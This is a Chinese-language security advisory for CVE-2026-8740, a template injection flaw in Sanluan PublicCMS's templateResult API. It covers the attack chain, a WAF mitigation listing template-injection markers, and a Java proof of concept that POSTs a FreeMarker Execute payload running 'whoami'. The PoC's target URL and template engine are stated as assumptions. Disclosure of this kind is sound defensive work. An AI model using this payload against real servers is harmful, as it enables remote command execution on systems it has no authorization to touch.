CVE-2026-8740: PublicCMS模板注入漏洞

漏洞信息

漏洞编号

CVE-2026-8740

漏洞类型

服务器端模板注入 (SSTI)

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Sanluan PublicCMS

漏洞概述

Sanluan PublicCMS 5.202506.d版本中存在一个严重的安全漏洞。该漏洞位于`TemplateResultDirective.java`文件的`execute`函数中，涉及`templateResult` API组件。由于对参数`templateContent`的特殊元素过滤不当，导致模板引擎不正确地中和了特殊元素。攻击者可以通过远程方式利用此漏洞，进行服务器端模板注入攻击。目前利用代码已被公开，且厂商未对此披露做出回应，风险较高。

技术细节

该漏洞核心在于Sanluan PublicCMS的模板处理逻辑存在缺陷。在`TemplateResultDirective`组件中，`execute`方法直接接收用户输入的`templateContent`参数，并将其传递给后端模板引擎进行渲染。由于未对输入内容进行严格的清洗或转义，攻击者可以注入恶意的模板表达式（如Java表达式或特定模板语法）。当服务器处理该请求时，模板引擎会解析并执行这些恶意指令。根据CVSS 3.1评分，该漏洞攻击复杂度低，无需用户交互，仅需低权限即可触发，可能导致敏感信息泄露、数据篡改或服务器被完全控制。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出目标站点使用的是Sanluan PublicCMS 5.202506.d版本，并确认`templateResult` API接口可访问。

STEP 2

2. 构造恶意载荷

攻击者构造包含恶意模板表达式（如SSTI payload）的`templateContent`参数数据。

STEP 3

3. 发送恶意请求

攻击者向受影响的API端点发送POST请求，将恶意载荷注入到模板渲染流程中。

STEP 4

4. 服务器端执行

服务器端TemplateResultDirective未正确过滤参数，将恶意内容传递给模板引擎解析并执行，导致攻击者获取服务器权限或敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-8740
 * Demonstrates SSTI via templateContent parameter
 */
import java.io.*;
import java.net.*;

public class CVE_2026_8740_PoC {
    public static void main(String[] args) {
        try {
            // Target URL (Hypothetical based on description)
            String url = "http://target-host:8080/api/directive/tools/templateResult";
            
            // Payload attempts to execute a simple command to verify vulnerability
            // Assuming FreeMarker or similar Java template engine syntax
            String payload = "${\"freemarker.template.utility.Execute\"?new()(\"whoami\")}";
            
            String params = "templateContent=" + URLEncoder.encode(payload, "UTF-8");
            
            HttpURLConnection conn = (HttpURLConnection) new URL(url).openConnection();
            conn.setRequestMethod("POST");
            conn.setDoOutput(true);
            conn.getOutputStream().write(params.getBytes("UTF-8"));
            
            System.out.println("Response Code: " + conn.getResponseCode());
            BufferedReader br = new BufferedReader(new InputStreamReader(conn.getInputStream()));
            String line;
            while ((line = br.readLine()) != null) {
                System.out.println(line);
            }
            br.close();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

影响范围

Sanluan PublicCMS 5.202506.d

防御指南

临时缓解措施

临时缓解措施：在Web应用防火墙（WAF）中添加规则，拦截请求体中包含常见模板注入特征（如`${`、`<%@`、`#{`）的流量。同时，建议暂时禁用`TemplateResultDirective`对应的功能接口，或仅允许内网受信任IP访问该API，以降低被攻击的风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-8740
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-8740
3 Details https://www.cvedetails.com/cve/CVE-2026-8740/
4 VulDB https://vuldb.com/cve/CVE-2026-8740
5 Link https://vuldb.com/submit/809932
6 Link https://vuldb.com/vuln/364328
7 Link https://vuldb.com/vuln/364328/cti
8 Link https://vulnplus-note.wetolink.com/share/ILcCnOvJ1fMc